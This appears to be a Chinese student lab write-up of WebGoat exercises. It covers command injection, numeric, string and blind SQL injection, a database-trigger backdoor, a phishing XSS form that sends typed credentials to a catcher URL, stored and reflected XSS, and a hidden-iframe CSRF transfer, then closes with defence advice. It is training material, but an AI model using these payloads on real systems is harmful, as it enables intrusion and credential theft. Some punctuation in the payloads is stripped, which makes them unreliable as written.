查数据的网站有哪些,网站推广位怎么设置,全网推广推荐,百度给做网站公司实践目标
#xff08;1#xff09;理解常用网络攻击技术的基本原理。#xff08;2#xff09;Webgoat实践下相关实验。 WebGoat
WebGoat是由著名的OWASP负责维护的一个漏洞百出的J2EE Web应用程序#xff0c;这些漏洞并非程序中的bug#xff0c;而是故意设计用来讲授We…实践目标
1理解常用网络攻击技术的基本原理。2Webgoat实践下相关实验。 WebGoat
WebGoat是由著名的OWASP负责维护的一个漏洞百出的J2EE Web应用程序这些漏洞并非程序中的bug而是故意设计用来讲授Web应用程序安全课程的。这个应用程序提供了一个逼真的教学环境为用户完成课程提供了有关的线索。因为WebGoat是基于java开发的软件所以它具有平台无关性在各种操作平台上都可以运行所以本次实验所处的系统为kali机在命令行中输入以下指令即可运行相关jar包 java -jar webgoat-container-7.0.1-war-exec.jarWebGoat默认使用8080端口所以在看到相关提示后即可开始INFO: Starting ProtocolHandler [http-bio-8080] BurpSuite
Burp Suite 是用于攻击web 应用程序的集成平台。它包含了许多工具并为这些工具设计了许多接口以促进加快攻击应用程序的过程。配置本机BurpSuite 在Proxy-Option中选择add添加项设置代理IP及其端口我设置的是8088和127.0.0.1添加完毕后选择run启动在浏览器中以火狐举例在Preferences-Advanced中选择Settings勾选Manual proxy configuration输入刚刚设置的IP与端口即可然后在Proxy-intercept点击“Intercept is off”即可启用代理 Injection Flaws
Command Injection
这个界面可以执行系统命令并返回给用户所以应该在请求项里面添加shell命令执行ifconfig具体来说就是用前文提到的BurpSuite工具拦截请求并将其中的参数改为我的是这样: AccessControlMatrix.help ifconfig表示执行这2个指令在网页的最后能看到ifconfig的结果成功
Numeric SQL Injection
要求尝试用SQL注入使得能查到所有的天气思路也很简单直接构造永真式即可查找到所有记录既可以按照上一题的思路用工具捕包修改也可以直接按F12修改网页源文件将需要查找的value改为101 or 11点击go看到所有城市的天气成功
Log Spoofing
题目的意思是要你写一个SQL字符串因为网页会将你输入错误的用户名返回给你所以我们的目标是使得网页返回给你的结果显示的你登录成功一样所以在用户名那构造语句gq%0d%0aLogin Succeeded for username: admin
LAB:SQL Injection
Stage 1String SQL Injection
根据描述是要求你在不知道密码的前提下还能登录成功那也就只能用SQL注入了利用SQL相关语法利用进行前后封闭构成一个永真式这一题较为基础构造方法也很多我用的是or 11需要注意的是如果直接写永真式会超过字符长度限制而一般永真式超过了限制的8字符所以得F12查看源代码对密码输入长度进行扩大再进行注入或者可以构造一个密码使得尽量提前封闭如我上述的密码刚好8个字符。为了能取得权限最好选择admin登录最后左边栏会有提示成功
Stage 2Parameterized Query #1
这个没有测试成功最后才发现题目中有这样一句话可能只有开发版的才可以成功吧 THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT
Stage 3Numeric SQL Injection
题目要求登录Larry账户但是能查看Boss的信息所以首先根据Stage 1中的万能密钥取得Larry权限这样我们就可以点击ViewProfile来查看相关信息了显然此时只能查到自己的信息但细究其原理不难发现与之前如出一辙此时要查看老板信息本质上还是查询数据库中字段为老板的那条记录并输出所以仍然可以在请求时注入不同的是此时没有输入框提供注入字符串所以我们要借助前文所提到的BurpSuite工具拦截此时的请求包构造SQL请求参数需要将employee_id的值改为101 or 11但测试后发现仍旧显示Larry的信息猜想是不是因为界面太小只能显示一个我这样的注入可以将所有的信息全查询到那怎样让它输出的第一个就是我们想要的老板信息呢仔细观察Larry的信息表可以发现有Salary这一字段说明数据表中也存在那么对于一个老板来说工资最高我就可以以工资为条件对查询结果进行个排序构造SQL语句如下 101 or 11 order by salary desc成功老板工资450k毕竟老板
Stage 4Parameterized Query #2
同Stage 2只能在开发版上成功
String SQL Injection
要求要你输入正确的Last name登录进去显然我啥都不知道只能用万能密钥试一试了根据前文输入 or 11成功因为为永真所以任何用户的信息都看见了
Database Backdoors
根据题目要求是要你使用多条语句的SQL注入更新数据表根据前一篇博客的多条语句注入练习在此设置如下SQL语句 101; update employee set salary10000发现数据表所有人员工资都等于10000已经更新成功以上是第一步要求第二步要求更加高级的是插入后门下边这个后门好象是创建新用户的时候会自动修改邮箱为你的邮箱 101; CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET emailjohnhackme.comWHERE userid NEW.userid
Blind Numeric SQL Injection
数字盲注,有些时候存在SQL注入,但是获取不到我们需要的信息此时可以通过SQL语句的条件判断进行盲注。比如这一关我们知道一个cc_number1111222233334444但是想知道其pin在pins table里的值可以使用盲注进行爆破输入 101 AND ((SELECT pin FROM pins WHERE cc_number1111222233334444) 10000 );打开BurpSuite工具监听捕获到第一条请求报文因为需要反复尝试我们可以通过该工具进行暴力破解右击报文选择send to intruder然后在Intruder下选择相关设置 在Target中设置本机IP地址HOST和端口号也就是WebGoat的地址和端口号在Positions中选择Sniper模式然后用光标选中需要暴力穷举的变量在此处是account_number后的值然后点击右侧的add添加在此之前点击clear清空所有的在Payloads中选择type类型为number然后设置变化范围并设置步长为1这样可以精确地找到数据包变化的number从而便于我们确认位置在Options中选择Start attack开始攻击找到数据包大小变化的位置2364用2364登录成功 Cross-Site Scripting (XSS)
Phishing with XSS
反射型XSS是最常用也是使用得最广的一种攻击方式。它通过给别人发送带有恶意脚本代码参数的URL当URL地址被打开时特有的恶意代码参数被HTML解析、执行。它的特点是非持久化必须用户点击带有特定参数的链接才能引起。将下边的代码输入到文本框XSS会造成一个钓鱼的登录界面用来骗取登录账户和密码
/formscriptfunction hack(){ XSSImagenew Image;XSSImage.srchttp://localhost:8080/WebGoat/catcher?PROPERTYyesuser document.phish.user.value password document.phish.pass.value ;alert(Had this been a real attack... Your credentials were just stolen. User Name document.phish.user.value Password document.phish.pass.value);
} /script
form namephish
brbr
HRH2This feature requires account login:/H2
brbrEnter Username:brinput typetext nameuserbrEnter Password:brinput typepassword name pass
brinput typesubmit namelogin valuelogin onclickhack()
/form
br
br
HRStored XSS Attacks
这是一种最典型的储存型XSS的例子因为没有对用户的输入进行编码所以用户A可以任意输入然后用户B点击用户A的留言触发了XSS导致中招具体操作是这样的 title可以任意输入根据第一次尝试可以发现输入的这个可以作为一个超链接更新保存在本界面点击后即可查看输入内容Message输入消息可以嵌入一段js代码用户点击后即可触发例如输入scriptalert(20145221 attack succeed!);/script
Reflected XSS Attacks
根据题目可以知道这是一个反射型的XSS攻击类同于第一个在交互输入的位置有XSS漏洞直接构造一段脚本即可发起攻击例如输入以下代码即可成功 scriptalert(20145221 attack succeed!);/script
Cross Site Request Forgery (CSRF)
这里是一个储存型XSS和CSRF结合的示例CSRF就是冒名登录用代码伪造请求这里是把CSRF恶意代码利用储存型XSS放到了网页上通过留言Message里输入构造恶意代码如下 iframe srcattack?Screen504amp;menu900amp;transferFunds5000/iframe当用户点击这个留言就会触发显示已转走5000元注意上述screen和menu参数的值和网站右边显示的要保持一致如果想让用户在不查觉的情况下可以将iframe中的长和宽参数设为1像素这样就看不见了 总结
SQL注入攻击原理如何防御
原理
就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串最终达到欺骗服务器执行恶意的SQL命令。具体来说它是利用现有应用程序将恶意的SQL命令注入到后台数据库引擎执行的能力它可以通过在Web表单中输入恶意SQL语句得到一个存在安全漏洞的网站上的数据库而不是按照设计者意图去执行SQL语句。
防御
检查变量数据类型和格式 如果你的SQL语句是类似where id{$id}这种形式数据库里所有的id都是数字那么就应该在SQL被执行前检查确保变量id是int类型如果是接受邮箱那就应该检查并严格确保变量一定是邮箱的格式其他的类型比如日期、时间等也是一个道理。总结起来只要是有固定格式的变量在SQL语句执行前应该严格按照固定格式去检查确保变量是我们预想的格式这样很大程度上可以避免SQL注入攻击。过滤特殊符号 对于无法确定固定格式的变量一定要进行特殊符号过滤或转义处理。以PHP为例通常是采用addslashes函数它会在指定的预定义字符前添加反斜杠转义这些预定义的字符是单引号 () 双引号 () 反斜杠 () NULL。绑定变量使用预编译语句 MySQL的mysqli驱动提供了预编译语句的支持不同的程序语言都分别有使用预编译语句的方法这样做的好处就是如果我输入密码or 11那他也只会被当作密码来处理不会和sql语句其他结构关联
XSS攻击的原理如何防御
原理
恶意攻击者往Web页面里插入恶意脚本代码而程序对于用户输入内容未过滤当用户浏览该页之时嵌入其中Web里面的脚本代码会被执行从而达到恶意攻击用户的特殊目的。
防御
一种方法是在表单提交或者url参数传递前对需要的参数进行过滤在输入方面对所有用户提交内容进行可靠的输入验证提交内容包括URL、查询关键字、http头、post数据等在输出方面在用户输内容中使用XMP标签。标签内的内容不会解释直接显示。严格执行字符输入字数控制因为XSS代码往往很多所以要对字符数进行控制
CSRF攻击原理如何防御
原理
跨站请求伪造攻击者盗用了你的身份以你的名义发送恶意请求。CSRF能够做的事情包括以你名义发送邮件发消息盗取你的账号甚至于购买商品虚拟货币转账造成的问题包括个人隐私泄露以及财产安全。
防御
验证码 可以在某些敏感操作过程中加入验证码以确认用户身份Token CSRF能攻击成功根本原因是操作所带的参数均被攻击者猜测到。既然知道根本原因我们就对症下药利用Token。当向服务器传参数时带上Token。这个Token是一个随机值并且由服务器和用户同时持有。当用户提交表单时带上Token值服务器就能验证表单和session中的Token是否一致。
实验感想
在安全领域一般用帽子的颜色来比喻黑客的善与恶“白帽子”和”黑帽子”是就是两个完全对立的群体。对于黑帽子而言他们只要找到系统的一个切入点就可以达到入侵破坏的目的而白帽子必须将自己系统所有可能被突破的地方都设防以保证系统的安全运行。看起来好像是不公平的但是安全世界里的规则就是这样可能我们的网站1000处都布防的很好考虑的很周到但是只要有一个地方疏忽了攻击者就会利用这个点进行突破让我们另外的1000处努力白费。而现在我们很多网络模型都是B/S结构这样web安全问题就越来越突出了本次实践只是冰山一角真正现实中可能会遇到更多更复杂的问题。
